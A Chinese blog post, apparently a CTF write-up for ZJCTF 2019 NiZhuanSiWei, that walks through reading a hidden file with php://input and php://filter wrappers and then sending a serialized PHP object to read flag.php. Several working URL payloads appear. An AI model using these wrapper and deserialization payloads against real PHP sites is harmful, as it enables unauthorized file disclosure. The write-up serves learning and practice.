[PHP知识库] WP [ZJCTF 2019]NiZhuanSiWei

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> WP [ZJCTF 2019]NiZhuanSiWei -> 正文阅读

[PHP知识库]WP [ZJCTF 2019]NiZhuanSiWei

做了一道知识点包含反序列化和PHP伪协议的题，写篇博客整理一下思路

启动靶机，我们看到如下页面在这里插入图片描述
分析代码，定义了text、file、password三个变量，剩下的代码都在一个if里，要上传text，可以使用php://input协议来执行，内容为"welcome to the zjctf"，代码注释部分有一个useless.php，我们可以使用php://filter伪协议来读取useless.php的内容。

构造payload:/?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php

使用Hackbar来传text参数：
在这里插入图片描述执行后得到一串base64加密过后的字符串：
base64解密后，得到一串PHP代码：

// An highlighted block
<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

代码注释部分提示我们文件名flag.php
实例化对象，名为a，并且使a对象中的文件是flag.php，并序列化a
在这里插入图片描述在浏览器中运行后得到：O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
构造payload:/?text=php://input&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}